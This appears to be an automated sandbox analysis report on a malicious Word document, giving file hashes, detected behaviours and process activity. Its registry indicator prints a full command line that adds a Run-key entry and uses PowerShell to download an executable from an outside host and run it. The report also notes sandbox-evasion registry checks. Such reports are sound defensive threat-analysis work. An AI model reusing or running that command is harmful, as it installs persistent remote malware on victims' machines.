Analysis
-
max time kernel
465s -
max time network
443s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
27/03/2025, 10:14
Behavioral task
behavioral1
Sample
504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392.doc
Resource
win10v2004-20250314-en
General
-
Target
504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392.doc
-
Size
179KB
-
MD5
e267aa39a15e33909dae39ec74828f8b
-
SHA1
ed519641868e38c0531358622bc10b863979e301
-
SHA256
504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392
-
SHA512
95d9712e8f760e589761337376b329c28e9b5ee2d6ededd77e9dae29dc5dab41927f382562848bd3e2dfeb72859ec6d373335cc51d6c91bf60c1a10da735bb8e
-
SSDEEP
3072:Ean7O40C8HRLzZI5Cb1WdqfzdVWnTqUJxDZaQnRBvbmV8tbB:Ean7t0tRHK5C+qfzdVoqwB8Qqk
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS_Office = "cmd /c echo WScript.CreateObject(\"WScript.Shell\").run \"cmd /c powershell iwr -outf %tmp%\\smss.exe https://shoru.net/db/main_db & start %tmp%\\smss.exe\",0,false>\"C:\\Users\\Public\\Libraries\\lib.vbs\"&wscript \"C:\\Users\\Public\\Libraries\\lib.vbs\"" WINWORD.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 5640 WINWORD.EXE 5640 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 5640 WINWORD.EXE 5640 WINWORD.EXE 5640 WINWORD.EXE 5640 WINWORD.EXE 5640 WINWORD.EXE 5640 WINWORD.EXE 5640 WINWORD.EXE 5640 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392.doc" /o ""1⤵
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5640
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD5ec1d93dc8461b88d40e865982e3852c9
SHA10fdef2717d204b7813a3232564efbe571cbf8672
SHA256423d5c9c293f9501b79eec2a17000c1d0647d3acc20a26d004a464c887da9452
SHA512dbc8ab830a94a8f821fd3ea546f51871f03200fa8b0a54efc70760f7344f027b9e049b72c7a651330fdd131e6a29b5fca3bb90c36eb7d1866a206111b3b68f2f